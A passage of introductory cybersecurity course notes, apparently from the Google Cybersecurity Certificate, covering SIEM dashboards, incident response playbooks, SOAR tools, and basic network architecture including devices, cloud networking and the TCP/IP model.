organization. Security analysts can use this dashboard to access a list of all user sign-in events to identify
unusual user activity, such as a user signing in from multiple locations at the same time. This
information is then used to help mitigate threats, risks, and vulnerabilities to user accounts and the
organization’s applications.
Key takeaways
SIEM tools provide dashboards that help security professionals organize and focus their security efforts.
This is important because it allows analysts to reduce risk by identifying, analyzing, and remediating the
highest priority items in a timely manner. Later in the program, you’ll have an opportunity to practice
using various SIEM tool features and commands for search queries.
Glossary terms from module 3
Terms and definitions from Course 2, Module 3
Chronicle: A cloud-native tool designed to retain, analyze, and search data
Incident response: An organization’s quick attempt to identify an attack, contain the damage, and correct
the effects of a security breach
Log: A record of events that occur within an organization’s systems
Metrics: Key technical attributes such as response time, availability, and failure rate, which are used to
assess the performance of a software application
Operating system (OS): The interface between computer hardware and the user
Playbook: A manual that provides details about any operational action
Security information and event management (SIEM): An application that collects and analyzes log data to
monitor critical activities in an organization
Security orchestration, automation, and response (SOAR): A collection of applications, tools, and
workflows that use automation to respond to security events
Splunk Cloud: A cloud-hosted tool used to collect, search, and monitor log data
Splunk Enterprise: A self-hosted tool used to retain, analyze, and search an organization's log data to
provide security information and alerts in real-time
Phases of Incident Response Playbooks
We discussed security information and event management, or SIEM tools, and how they can be used
to help organizations improve their security posture. Let's continue our security
journey by exploring another tool security professionals use: playbooks. In this section, we'll
explore how playbooks help security teams respond to threats, risks, or vulnerabilities identified by
SIEM tools. we'll introduce another important tool for maintaining an organization's security,
known as a playbook. A playbook is a manual that provides details about any operational action.
Playbooks also clarify what tools should be used in response to a security incident. In the security
field, playbooks are essential. Urgency, efficiency, and accuracy are necessary to quickly identify
and mitigate a security threat to reduce potential risk. Playbooks ensure that people follow a
consistent list of actions in a prescribed way, regardless of who is working on the case. Different
types of playbooks are used. These include playbooks for incident response, security alerts, teamsspecific, and product-specific purposes. Here, we'll focus on a playbook that's commonly used in
cybersecurity, called an incident response playbook. Incident response is an organization's quick
attempt to identify an attack, contain the damage, and correct the effects of a security breach. An
incident response playbook is a guide with six phases used to help mitigate and manage security
incidents from beginning to end. Let's discuss each phase.
The first phase is preparation. Organizations must prepare to mitigate the likelihood, risk, and
impact of a security incident by documenting procedures, establishing staffing plans, and educating
users. Preparation sets the foundation for successful incident response. For example, organizations
can create incident response plans and procedures that outline the roles and responsibilities of
each security team member.
The second phase is detection and analysis. The objective of this phase is to detect and analyze
events using defined processes and technology. Using appropriate tools and strategies during this
phase helps security analysts determine whether a breach has occurred and analyze its possible
magnitude.
The third phase is containment. The goal of containment is to prevent further damage and reduce
the immediate impact of a security incident. During this phase, security
professionals take actions to contain an incident and minimize damage. Containment is a high
priority for organizations because it helps prevent ongoing risks to critical assets and data.
The fourth phase in an incident response playbook is eradication and recovery. This phase involves
the complete removal of an incident's artifacts so that an organization can return to normal
operations. During this phase, security professionals eliminate artifacts of the incident by removing
malicious code and mitigating vulnerabilities. Once they've exercised
due diligence, they can begin to restore the affected environment to a secure state. This is also
known as IT restoration.
The fifth phase is post-incident activity. This phase includes
documenting the incident, informing organizational leadership, and applying lessons
learned to ensure that an organization is better prepared to handle future incidents. Depending on
the severity of the incident, organizations can conduct a full-scale incident analysis to determine the
root cause of the incident and implement various updates or improvements to enhance its overall
security posture.
The sixth and final phase in an incident response playbook is coordination. Coordination involves
reporting incidents and sharing information, throughout the incident response process, based on
the organization's established standards. Coordination is important for many reasons. It ensures
that organizations meet compliance requirements and it allows for coordinated response and
resolution. There are many ways security professionals may be alerted to an incident. You recently
learned about SIEM tools and how they collect and analyze data. They use this data to detect threats
and generate alerts, which can inform the security team of a potential incident. Then, when a
security analyst receives a SIEM alert, they can use the appropriate playbook to guide the response
process. SIEM tools and playbooks work together to provide a structured and efficient way of
responding to potential security incidents.
Playbook overview
A playbook is a manual that provides details about any operational action. Essentially, a playbook
provides a predefined and up-to-date list of steps to perform when responding to an incident.
Playbooks are accompanied by a strategy. The strategy outlines expectations of team members who are
assigned a task, and some playbooks also list the individuals responsible. The outlined expectations are
accompanied by a plan. The plan dictates how the specific task outlined in the playbook must be
completed.
Playbooks should be treated as living documents, which means that they are frequently updated by
security team members to address industry changes and new threats. Playbooks are generally managed
as a collaborative effort since security team members have different levels of expertise.
Updates are often made if:
●
A failure is identified, such as an oversight in the outlined policies and procedures, or in the
playbook itself.
●
●
There is a change in industry standards, such as changes in laws or regulatory compliance.
The cybersecurity landscape changes due to evolving threat actor tactics and techniques.
Types of playbooks
Playbooks sometimes cover specific incidents and vulnerabilities. These might include ransomware,
vishing, business email compromise (BEC), and other attacks previously discussed. Incident and
vulnerability response playbooks are very common, but they are not the only types of playbooks
organizations develop.
Each organization has a different set of playbook tools, methodologies, protocols, and procedures that
they adhere to, and different individuals are involved at each step of the response process, depending on
the country they are in. For example, incident notification requirements from government-imposed laws
and regulations, along with compliance standards, affect the content in the playbooks. These
requirements are subject to change based on where the incident originated and the type of data
affected.
Incident and vulnerability response playbooks
Incident and vulnerability response playbooks are commonly used by entry-level cybersecurity
professionals. They are developed based on the goals outlined in an organization’s business continuity
plan. A business continuity plan is an established path forward allowing a business to recover and
continue to operate as normal, despite a disruption like a security breach.
These two types of playbooks are similar in that they both contain predefined and up-to-date lists of
steps to perform when responding to an incident. Following these steps is necessary to ensure that you,
as a security professional, are adhering to legal and organizational standards and protocols. These
playbooks also help minimize errors and ensure that important actions are performed within a specific
timeframe.
When an incident, threat, or vulnerability occurs or is identified, the level of risk to the organization
depends on the potential damage to its assets. A basic formula for determining the level of risk is that risk
equals the likelihood of a threat. For this reason, a sense of urgency is essential. Following the steps
outlined in playbooks is also important if any forensic task is being carried out. Mishandling data can
easily compromise forensic data, rendering it unusable.
Common steps included in incident and vulnerability playbooks include:
●
●
●
●
●
●
Preparation
Detection
Analysis
Containment
Eradication
Recovery from an incident
Additional steps include performing post-incident activities, and a coordination of efforts throughout
the investigation and incident and vulnerability response stages.
Key takeaways
It is essential to refine processes and procedures outlined in a playbook. With every documented
incident, cybersecurity teams need to consider what was learned from the incident and what
improvements should be made to handle incidents more effectively in the future. Playbooks create
structure and ensure compliance with the law.
Resources for more information
Incident and vulnerability response playbooks are only two examples of the many playbooks that an
organization uses. If you plan to work as a cybersecurity professional outside of the U.S., you may want
to explore the following resources:
●
●
●
●
●
United Kingdom, National Cyber Security Center (NCSC) - Incident Management
Australian Government - Cyber Incident Response Plan
Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) - Vulnerability
Handling and related guidelines
Government of Canada - Ransomware Playbook
Scottish Government - Playbook Templates
Use a playbook to respond to threats, risks, or vulnerabilities
In this video, we're going to revisit SIEM tools and how they're used alongside playbooks to reduce
organizational threats, risks, and vulnerabilities. An incident response playbook is a guide that help
security professionals mitigate issues with a heightened sense of urgency, while maintaining
accuracy. Playbooks create structure, ensure compliance, and outline processes for communication
and documentation. Organizations may use different types of incident response playbooks
depending on the situation. For example, an organization may have specific playbooks for
addressing different types of attacks, such as ransomware, malware, distributed denial of service,
and more. To start, let's discuss how a security analyst might use a playbook to address a SIEM
alert, like a potential malware attack. In this situation, a playbook is invaluable for guiding an
analyst through the necessary actions to properly address the alert.
The first action in the playbook is to assess the alert. This means determining if the alert is valid by
identifying why the alert was generated by the SIEM. This can be done by analyzing log data and
related metrics.
Next, the playbook outlines the actions and tools to use to contain the malware and reduce further
damage. For example, this playbook instructs the analyst to isolate, or disconnect, the infected
network system to prevent the malware from spreading into other parts of the network.
After containing the incident, step three of the playbook describes ways to eliminate all traces of the
incident and restore the affected systems back to normal operations. For example, the playbook
might instruct the analyst to restore the impacted operating system, then restore the affected data
using a clean backup, created before the malware outbreak.
Finally, once the incident has been resolved, step four of the playbook instructs
the analyst to perform various post-incident activities and coordination efforts with the security
team. Some actions include creating a final report to communicate the security
incident to stakeholders, or reporting the incident to the appropriate authorities, like the U.S.
Federal Bureau of Investigations or other agencies that investigate cyber crimes. This is just one
example of how you might follow the steps in a playbook, since organizations develop
their own internal procedures for addressing security incidents. What's most important to
understand is that playbooks provide a consistent process for security professionals to follow. Note
that playbooks are living documents, meaning the security team will make frequent changes,
updates, and improvements to address new threats and vulnerabilities. In addition, organizations
learn from past security incidents to improve their security posture, refine policies and procedures,
and reduce the likelihood and impact of future incidents. Then, they update their playbooks
accordingly. As an entry-level security analyst, you may be required to use playbooks frequently,
especially when monitoring networks and responding to incidents. Understanding why playbooks
are important and how they can help you achieve your working objectives will help ensure your
success within this field.
Playbooks, SIEM tools, and SOAR tools
Previously, you learned that security teams encounter threats, risks, vulnerabilities, and incidents on a
regular basis and that they follow playbooks to address security-related issues. In this reading, you will
learn more about playbooks, including how they are used in security information and event
management (SIEM) and security orchestration, automation, and response (SOAR).
Playbooks and SIEM tools
Playbooks are used by cybersecurity teams in the event of an incident. Playbooks help security teams
respond to incidents by ensuring that a consistent list of actions are followed in a prescribed way,
regardless of who is working on the case. Playbooks can be very detailed and may include flow charts
and tables to clarify what actions to take and in which order. Playbooks are also used for recovery
procedures in the event of a ransomware attack. Different types of security incidents have their own
playbooks that detail who should take what action and when.
Playbooks are generally used alongside SIEM tools. If, for example, unusual user behavior is flagged by a
SIEM tool, a playbook provides analysts with instructions about how to address the issue.
Playbooks and SOAR tools
Playbooks are also used with SOAR tools. SOAR tools are like SIEM tools in that they are used for threat
monitoring. SOAR is a piece of software used to automate repetitive tasks generated by tools such as a
SIEM or managed detection and response (MDR). For example, if a user attempts to log into their
computer too many times with the wrong password, a SOAR will automatically block their account to
stop a possible intrusion. Then, analysts would refer to a playbook to take steps to resolve the issue.
Key takeaways
What is most important to know is that playbooks, also sometimes referred to as runbooks, provide
detailed actions for security teams to take in the event of an incident. Knowing exactly who needs to do
what and when can help reduce the impact of an incident and reduce the risk of damage to an
organization’s critical assets.
Glossary terms from module 4
Terms and definitions from Course 2, Module 4
Incident response: An organization’s quick attempt to identify an attack, contain the damage, and correct
the effects of a security breach
Playbook: A manual that provides details about any operational action
Congratulations on completing this course! Let's recap what we've covered so far. First, we
reviewed CISSP's eight security domains and focused on threats, risks, and vulnerabilities to
business operations. Then, we explored security frameworks and controls, and how they're a
starting point for creating policies and processes for security management. This included a
discussion of the CIA triad, NIST frameworks, and security design principles, and how they
benefit the security community. This was followed by a discussion about how frameworks, controls,
and principles are related to security audits. We also explored basic security tools, such as SIEM
dashboards, and how they are used to protect business operations. And finally, we covered how to
protect assets and data by using playbooks. As a security analyst, you may be working on multiple
tasks at once. Understanding the tools you have at your disposal, and how to use them, will elevate
your knowledge in the field while helping you successfully accomplish your everyday tasks.
Course 3 – Network Architecture
Learning Objectives
●
●
●
●
●
Define types of networks
Describe physical components of a network
Understand how the TCP/IP model provides a framework for network communication
Explain how data is sent and received over a network
Explain network architecture
Now we'll explore one of those domains further: networks. It's important to secure networks
because network-based attacks are growing in both frequency and complexity. Hi there! My name is
Chris, and I'm the Chief Information Security Officer for Google Fiber. I'm excited to be your
instructor for this course! I've been working in network security and engineering for over 20 years,
and I'm looking forward to sharing some of my knowledge and experience with you. This course
will help you understand the basic structure of a network (also referred to as network architecture)
and commonly used network tools. You'll also learn about network operations
and explore some basic network protocols. Next, you'll learn about common network attacks and
how network intrusion tactics can prevent a threat to a network. Finally, the course will provide an
overview of security hardening practices and how you might use them
to help secure a network.
Course 3 overview
Hello and welcome to Connect and Protect: Networks and Network Security, the third course in the
Google Cybersecurity Certificate. You’re on an exciting journey!
By the end of this course, you will develop a greater understanding of network architecture, operations,
intrusion tactics, common types of network vulnerabilities and attacks, and how to secure networks.
You’ll also be introduced to common network protocols, firewalls, virtual private networks (VPNs), and
system hardening practices.
Certificate program progress
The Google Cybersecurity Certificate program has eight courses. Connect and Protect: Networks and
Network Security is the third course.
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — (current course) Gain an understanding
of network-level vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying
databases with SQL.
5. Assets, Threats, and Vulnerabilities — Learn about the importance of security controls and
developing a threat actor mindset to protect and defend an organization’s assets from various
threats, risks, and vulnerabilities.
6. Sound the Alarm: Detection and Response — Understand the incident response lifecycle and
practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming language and
write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classification, escalation,
and ways to communicate with stakeholders. This course closes out the program with tips on
how to engage with the cybersecurity community and prepare for your job search.
Course 3 content
Module 1: Network architecture
You'll be introduced to network security and explain how it relates to ongoing security threats and
vulnerabilities. You will learn about network architecture and mechanisms to secure a network.
Module 2: Network operations
You will explore network protocols and how network communication can introduce vulnerabilities. In
addition, you'll learn about common security measures, like firewalls, that help network operations
remain safe and reliable.
Module 3: Secure against network intrusions
You will understand types of network attacks and techniques used to secure compromised network
systems and devices. You'll explore the many ways that malicious actors exploit vulnerabilities in
network infrastructure and how cybersecurity professionals identify and close potential loopholes.
Module 4: Security hardening
You will become familiar with network hardening practices that strengthen network systems. You'll
learn how security hardening helps defend against malicious actors and intrusion methods. You'll also
learn how to use security hardening to address the unique security challenges posed by cloud
infrastructures.
Module 1 – Network Architecture/Design
Before you can understand the importance of securing a network, you need to know what a
network is. A network is a group of connected devices. At home, the devices connected to
your network might be your laptop, cell phones, and smart devices, like your refrigerator or air
conditioner. In an office, devices like workstations, printers, and servers all connect to the network.
The devices on a network can communicate with each other over network cables, or wireless
connections. Networks in your home and office can communicate with networks in other locations,
and the devices on them. Devices need to find each other on a network to establish
communications. These devices will use unique addresses, or identifiers, to locate each other. The
addresses will ensure that communications happens with the right device. These are called the IP
and MAC addresses. Devices can communicate on two types of networks: a local area network, also
known as a LAN, and a wide area network, also known as a WAN. A local area network, or LAN,
spans a small area like an office building, a school, or a home. For example, when a personal device
like your cell phone or tablet connects to the WIFI in your house, they form a LAN. The LAN then
connects to the internet. A wide area network or WAN spans a large geographical area like a city,
state, or country. You can think of the internet as one big WAN. An employee of a company in San
Francisco can communicate and share resources with another employee in Dublin, Ireland over the
WAN.
Emmanuel: Useful skills for network security
My name is Emmanuel and I am an offensive security engineer at Google. For offensive security, my
job is to simulate adversaries and threats that are targeting
various companies and I look at defending how we can protect Google's
infrastructure. I make it harder to hack Google by actually
hacking Google. The technical skills that I use is a lot of programming, as well as learning about
operational and platform security. Knowing how these
computers work, what is under the hood, and understanding the components that create this
infrastructure. An entry-level cybersecurity analyst would look at using command lines, log parsing,
and network traffic analysis in their
everyday scope of work. Command line allows you to interact with various levels of
your operating system, whether it's the low-level things like the memory and the kernel, or if it's
high-level things like the applications and the programs that you're running
on your computer. With log parsing, they're going to be times where you
may need to figure out and debug what is going on in your program or application and
these logs are there to help you and support you in finding the root issue and
then resolve it from there. With this network traffic analysis, there may be times where
you need to figure out why is my Internet going slow? Why is traffic not being routed to the
appropriate destination? What can I do to ensure that my network
is up and running? Network traffic analysis is looking at network across various application
and network layers and seeing what that traffic is doing, how we can secure that traffic, as well as
identify any vulnerabilities and concerns. In the contexts for
me, for security, I look at: are passwords being leaked in the traffic that's being sent across the
network? Are infrastructures being secured? Are firewalls being readily configured and
configured safely? One skill that has continued to grow with me in my current role has been
communicating effectively to product teams, engineers, and identifying an issue
that is influencing or affecting the business, and communicating to those teams
effectively to fix it. Being able to take on these many hats and explain things with the
right business approach to things to ensure that the issues that I do find in my work are identified
but there are also fixed. My advice to folks who are taking this certificate would take things apart,
feel uncomfortable, learn and grow and find opportunities to learn
and understand how things work and that skill set will benefit you for the
remainder of your journey.
Network Tools
In this video, you'll learn about the common devices that make up a network. Let's get started. A
hub is a network device that broadcasts information to every device on the network. Think of a hub
like a radio tower that broadcasts a signal to any radio tuned to the correct frequency. Another
network device is a switch. A switch makes connections between specific devices on a network by
sending and receiving data between them. A switch is more intelligent than a hub. It only passes
data to the intended destination. This makes switches more secure than hubs, and enables them to
control the flow of traffic and improve network performance. Another device that we'll discuss is a
router. A router is a network device that connects multiple networks together. For example, if a
computer in one network wants to send information to a tablet on another network, then the
information will be transferred as follows: First, the information travels from the computer to the
router. Then, the router reads the destination address, and forwards the data to the intended
network's router. Finally, the receiving router directs that information
to the tablet. Finally, let's discuss modems. A modem is a device that connects your router to the
internet, and brings internet access to the LAN. For example, if a computer from
one network wants to send information to a device on a network in a different geographic location,
it would be transferred as follows: The computer would send information to the router, and the
router would then transfer the information through the modem to the internet. The intended
recipient's modem receives the information, and transfers it to the router. Finally, the recipient's
router forwards that information to the destination device. Network tools such as hubs, switches,
routers, and modems are physical devices. However, many functions performed by these physical
devices can be completed by virtualization tools. Virtualization tools are pieces of software that
perform network operations. Virtualization tools carry out operations that would normally be
completed by a hub, switch, router, or modem, and they are offered by
Cloud service providers. These tools provide opportunities for cost savings and scalability. You'll
learn more about them later in the certificate program. Now you've explored some common devices
that make up a network. Coming up, you're going to learn more about cloud computing, and how
networks can be designed using cloud services.
Network components, devices, and diagrams
In this section of the course, you will learn about network architecture.
Once you have a foundational understanding of network architecture, sometimes referred to as network
design, you will learn about security vulnerabilities inherent in all networks and how malicious actors
attempt to exploit them. In this reading, you will review network devices and connections and
investigate a simple network diagram similar to those used every day by network security professionals.
Essential tasks of a security analyst include setting up the tools, devices, and protocols used to observe
and secure network traffic.
Devices on a network
Network devices are the devices that maintain information and services for users of a network. These
devices connect over wired and wireless connections. After establishing a connection to the network,
the devices send data packets. The data packets provide information about the source and the
destination of the data.
Devices and desktop computers
Most internet users are familiar with everyday devices, such as personal computers, laptops, mobile
phones, and tablets. Each device and desktop computer has a unique MAC address and IP address, which
identify it on the network, and a network interface that sends and receives data packets. These devices
can connect to the network via a hard wire or a wireless connection.
Firewalls
A firewall is a network security device that monitors traffic to or from your network. Firewalls can also
restrict specific incoming and outgoing network traffic. The organization configures the security rules.
Firewalls often reside between the secured and controlled internal network and the untrusted network
resources outside the organization, such as the internet.
Servers
Servers provide a service for other devices on the network. The devices that connect to a server are
called clients. The following graphic outlines this model, which is called the client-server model. In this
model, clients send requests to the server for information and services. The server performs the
requests for the clients. Common examples include DNS servers that perform domain name lookups for
internet sites, file servers that store and retrieve files from a database, and corporate mail servers that
organize mail for a company.
Cloud networks
Companies have traditionally owned their network devices, and kept them in their own office buildings.
But now, a lot of companies are using third-party
providers to manage their networks. Why? Well, this model helps companies save
money while giving them access to more network resources. The growth of cloud computing is
helping many companies reduce costs and streamline their network operations. Cloud computing is the
practice of using remote servers, applications, and network services that are hosted on the internet
instead of on local physical devices. Today, the number of businesses that use
cloud computing is increasing every year, so it's important to understand how cloud
networks function and how to secure them. Cloud providers offer an alternative
to traditional on-premise networks, and allow organizations to have the benefits
of the traditional network without storing the devices and managing
the network on their own. A cloud network is a collection of servers
or computers that stores resources and data in a remote data center that
can be accessed via the internet. Because companies don't house
the servers at their physical location, these servers are referred
to as being "in the cloud". Traditional networks host web servers from
a business in its physical location. However, cloud networks are different from
traditional networks because they use remote servers, which
allow online services and web applications to be used
from any geographic location. Cloud security will become increasingly
relevant to many security professionals as more organizations migrate
to cloud services. Cloud service providers offer cloud
computing to maintain applications. For example,
they provide on-demand storage and processing power that their
customers only pay as needed. They also provide business and web analytics that organizations can use
to monitor their web traffic and sales. With the transition to cloud networking,
I have witnessed an overlap of identity-based security on top of the more
traditionaFl network-based solutions. This meant that my focus needed to be
on verifying both where the traffic is coming from and
the identity that is coming with it. More organizations are moving their network
services to the cloud to save money and simplify their operations. As this trend has grown, cloud
security has become a significant
aspect of network security.
Hubs and switches
Hubs and switches both direct traffic on a local network. A hub is a device that provides a common point
of connection for all devices directly connected to it. Hubs additionally repeat all information out to all
ports. From a security perspective, this makes hubs vulnerable to eavesdropping. For this reason, hubs
are not used as often on modern networks; most organizations use switches instead.
A switch forwards packets between devices directly connected to it. It maintains a MAC address table
that matches MAC addresses of devices on the network to port numbers on the switch and forwards
incoming data packets according to the destination MAC address.
Routers
Routers sit between networks and direct traffic, based on the IP address of the destination network. The
IP address of the destination network is contained in the IP header. The router reads the header
information and forwards the packet to the next router on the path to the destination. This continues
until the packet reaches the destination network. Routers can also include a firewall feature that allows
or blocks incoming traffic based on information in the transmission. This stops malicious traffic from
entering the private network and damaging the local area network.
Modems and wireless access points
Modems
Modems usually interface with an internet service provider (ISP). ISPs provide internet connectivity via
telephone lines, coaxial cables, fiber-optic cables, or satellites. Modems receive transmissions from the
internet and translate them into digital signals that can be understood by the devices on the network.
Usually, modems connect to a router that takes the decoded transmissions and sends them on to the
local network.
Note: Enterprise networks used by large organizations to connect their users and devices often use
other broadband technologies to handle high-volume traffic, instead of using a modem.
Wireless access point
A wireless access point sends and receives digital signals over radio waves creating a wireless network.
Devices with wireless adapters connect to the access point using Wi-Fi. Wi-Fi refers to a set of standards
that are used by network devices to communicate wirelessly. Wireless access points and the devices
connected to them use Wi-Fi protocols to send data through radio waves where they are sent to routers
and switches and directed along the path to their final destination.
Using network diagrams as a security analyst
Network diagrams allow network administrators and security personnel to imagine the architecture and
design of their organization’s private network.
Network diagrams are topographical maps that show the devices on the network and how they connect.
Network diagrams use small representative graphics to portray each network device and dotted lines to
show how each device connects to the other. Security analysts use network diagrams to learn about
network architecture and how to design networks.
Key takeaways
In the client-server model, the client requests information and services from the server, and the server
performs the requests for the clients. Network devices include routers, workstations, servers, hubs,
switches, and modems. Security analysts use network diagrams to visualize network architecture.
Resources
Google Cloud Networking Overview
Cloud computing and software-defined
networks
In this section of the course, you’ve been learning the basic architecture of networks. You’ve learned
about how physical network devices like workstations, servers, routers, and switches connect to each
other to create a network. Networks may cover small geographical areas, as is the case in a local area
network (LAN). Or they may span a large geographic area, like a city, state, or country, as is the case in a
wide area network (WAN). You also learned about cloud networks and how cloud computing has grown
in recent years.
In this reading, you will further examine the concepts of cloud computing and cloud networking. You’ll
also learn about hybrid networks and software-defined networks, as well as the benefits they offer. This
reading will also cover the benefits of hosting networks in the cloud and why cloud-hosting is beneficial
for large organizations.
Computing processes in the cloud
Traditional networks are called on-premise networks, which means that all of the devices used for
network operations are kept at a physical location owned by the company, like in an office building, for
example. Cloud computing, however, refers to the practice of using remote servers, applications, and
network services that are hosted on the internet instead of at a physical location owned by the company.
A cloud service provider (CSP) is a company that offers cloud computing services. These companies own
large data centers in locations around the globe that house millions of servers. Data centers provide
technology services, such as storage, and compute at such a large scale that they can sell their services to
other companies for a fee. Companies can pay for the storage and services they need and consume them
through the CSP’s application programming interface (API) or web console.
CSPs provide three main categories of services:
●
●
●
Software as a service (SaaS) refers to software suites operated by the CSP that a company can
use remotely without hosting the software.
Infrastructure as a service (Iaas) refers to the use of virtual computer components offered by the
CSP. These include virtual containers and storage that are configured remotely through the
CSP’s API or web console. Cloud-compute and storage services can be used to operate existing
applications and other technology workloads without significant modifications. Existing
applications can be modified to take advantage of the availability, performance, and security
features that are unique to cloud provider services.
Platform as a service (PaaS) refers to tools that application developers can use to design custom
applications for their company. Custom applications are designed and accessed in the cloud and
used for a company’s specific business needs.
Hybrid cloud environments
When organizations use a CSP’s services in addition to their on-premise computers, networks, and
storage, it is referred to as a hybrid cloud environment. When organizations use more than one CSP, it is
called a multi-cloud environment. The vast majority of organizations use hybrid cloud environments to
reduce costs and maintain control over network resources.
Software-defined networks
CSPs offer networking tools similar to the physical devices that you have learned about in this section of
the course. Next, you’ll review software-defined networking in the cloud. Software-defined networks
(SDNs) are made up of virtual network devices and services. Just like CSPs provide virtual computers,
many SDNs also provide virtual switches, routers, firewalls, and more. Most modern network hardware
devices also support network virtualization and software-defined networking. This means that physical
switches and routers use software to perform packet routing. In the case of cloud networking, the SDN
tools are hosted on servers located at the CSP’s data center.
Benefits of cloud computing and software-defined networks
Three of the main reasons that cloud computing is so attractive to businesses are reliability, decreased
cost, and increased scalability.
Reliability
Reliability in cloud computing is based on how available cloud services and resources are, how secure
connections are, and how often the services are effectively running. Cloud computing allows employees
and customers to access the resources they need consistently and with minimal interruption.
Cost
Traditionally, companies have had to provide their own network infrastructure, at least for internet
connections. This meant there could be potentially significant upfront costs for companies. However,
because CSPs have such large data centers, they are able to offer virtual devices and services at a
fraction of the cost required for companies to install, patch, upgrade, and manage the components and
software themselves.
Scalability
Another challenge that companies face with traditional computing is scalability. When organizations
experience an increase in their business needs, they might be forced to buy more equipment and
software to keep up. But what if business decreases shortly after? They might no longer have the
business to justify the cost incurred by the upgraded components. CSPs reduce this risk by making it
easy to consume services in an elastic utility model as needed. This means that companies only pay for
what they need when they need it.
Changes can be made quickly through the CSPs, APIs, or web console—much more quickly than if
network technicians had to purchase their own hardware and set it up. For example, if a company needs
to protect against a threat to their network, web application firewalls (WAFs), intrusion
detection/protection systems (IDS/IPS), or L3/L4 firewalls can be configured quickly whenever
necessary, leading to better network performance and security.
Key takeaways
In this reading, you learned more about cloud computing and cloud networking. You learned that CSPs
are companies that own large data centers that house millions of servers in locations all over the globe
and then provide modern technology services, including compute, storage, and networking, through the
internet. SDNs are an approach to network management. SDNs enable dynamic, programmatically
efficient network configurations to improve network performance and monitoring. This makes it more
like cloud computing than traditional network management. Organizations can improve reliability, save
costs, and scale quickly by using CSPs to provide networking services instead of building and
maintaining their own network infrastructure.
Resources for more information
For more information about cloud computing and the services offered, you can review Google Cloud
(GC).
Network Communication
Networks help organizations communicate and connect. But communication makes network
attacks more likely because it gives a malicious actor an opportunity to take
advantage of vulnerable devices and unprotected networks. Communication over a network
happens when data is transferred from one point to another. Pieces of data are typically
referred to as data packets. A data packet is a basic unit of information that travels from one device
to another within a network. When data is sent from one device to another across a network, it is
sent as a packet that contains information about where the packet is going, where it's coming from,
and the content of the message. Think about data packets like
a piece of physical mail. Imagine you want to send a letter to a friend. The envelope will need to
have the address where you want the letter to go and your return address. Inside the envelope is a
letter that contains the message that you want your friend to read. A data packet is very
similar to a physical letter. It contains a header that includes the internet protocol address, the IP
address, and the media access control, or MAC, address of the destination device. It also includes a
protocol number that tells the receiving device what to do with the information in the packet. Then
there's the body of the packet, which contains the message that needs to be transmitted to the
receiving device. Finally, at the end of the packet, there's a footer, similar to a signature on a letter,
the footer signals to the receiving device that the packet is finished. The movement of data packets
across a network can provide an indication of how well the network is performing. Network
performance can be measured by bandwidth. Bandwidth refers to the amount of data a device
receives every second. You can calculate bandwidth by dividing the quantity of data by the time in
seconds. Speed refers to the rate at which data packets are received or downloaded. Security
personnel are interested in network bandwidth and speed because if either are irregular, it could
be an indication of an attack. Packet sniffing is
the practice of capturing and inspecting data packets across the network. Communication on the
network is important for sharing resources and data because it allows organizations
to function effectively. Coming up, you'll learn more about the protocols to support network
communication.
The TCP/IP model
Hello again. In this video, you'll learn more about communication protocols and devices used to
communicate with each other across the internet. This is called the TCP/IP model. TCP/IP stands
for Transmission Control Protocol and Internet Protocol. TCP/IP is the standard model used for
network communication. Let's take a closer look at this model by defining TCP and IP separately.
First, TCP, or Transmission Control Protocol, is an internet communication protocol that allows two
devices to form a connection and stream data. The protocol includes a set of instructions to organize
data, so it can be sent across a network. It also establishes a connection between two devices and
makes sure that packets reach their appropriate destination. The IP in TCP/IP stands for Internet
Protocol. IP has a set of standards used for routing and addressing data packets as they travel
between devices on a network. Included in the Internet Protocol (IP) is the IP address that functions
as an address for each private network. You'll learn more about IP addresses a bit later. When data
packets are sent and received across a network, they are assigned a port. Within the operating
system
of a network device, a port is a software-based location that organizes the sending and receiving of
data between devices on a network. Ports divide network traffic into segments based on the service
they will perform between two devices. The computers sending and receiving these data segments
know how to prioritize and process these segments based on their port number. This is like sending
a letter to a friend who lives in an apartment building. The mail delivery person not only knows
how to find the building, but they also know exactly
where to go in the building to find the apartment number where your friend lives. Data packets
include instructions that tell the receiving device what to do with the information. These
instructions come in the form of a port number. Port numbers allow computers to split the network
traffic and prioritize the operations they will perform with the data. Some common port
numbers are: port 25, which is used for e-mail, port 443, which is used for secure internet
communication, and port 20, for large file transfers. As you've learned in this video, a lot of
information and instructions are contained in data packets as they travel across a network.
The four layers of the TCP/IP model
Now that we've discussed the structure of a network and how communications takes place, it's
important for you to know how the security professionals identify problems that might arise. The
TCP/IP model is a framework that is used to visualize how data is organized and transmitted across
the network. The TCP/IP model has four layers. The four layers are: the network access layer, the
internet layer, the transport layer, and the application layer. Knowing how the TCP/IP model
organizes network activity allows security professionals to monitor and secure against risks. Let's
examine these layers one at a time. Layer one is the network access layer. The network access layer
deals with creation of data packets and their transmission across a network. This includes
hardware devices connected to physical cables and switches that direct data to its destination.
Layer two is the internet layer. The internet layer is where IP addresses are attached to data packets
to indicate the location of the sender and receiver. The internet layer also focuses on how networks
connect to each other. For example, data packets containing information that determine whether
they will stay on the LAN or will be sent to a remote network, like the internet. The transport layer
includes protocols to control the flow of traffic across a network. These protocols permit or deny
communication with other devices and include information about the status of the connection.
Activities of this layer include error control, which ensures data is flowing smoothly across the
network. Finally, at the
application layer, protocols determine how the data packets will interact with receiving devices.
Functions that are organized at application layer include file transfers and email services. Now you
understand the TCP/IP model and its four layers.
Learn more about the TCP/IP model
In this reading, you will build on what you have learned about the Transmission Control
Protocol/Internet Protocol (TCP/IP) model, consider the differences between the Open
Systems Interconnection (OSI) model and TCP/IP model, and learn how they’re related.
Then, you’ll review each layer of the TCP/IP model and go over common protocols used in
each layer.
As a security professional, it's important that you understand the TCP/IP model because all
communication on a network is organized using network protocols. Network protocols are
a language that systems use to communicate with each other. In order for two network
systems to successfully communicate with each other, they need to use the same protocol.
The two most common models available are the TCP/IP and the OSI model. These models
are a representative guideline of how network communications work together and move
throughout the network and the host. The examples provided in this course will follow the
TCP/IP model.
The TCP/IP model
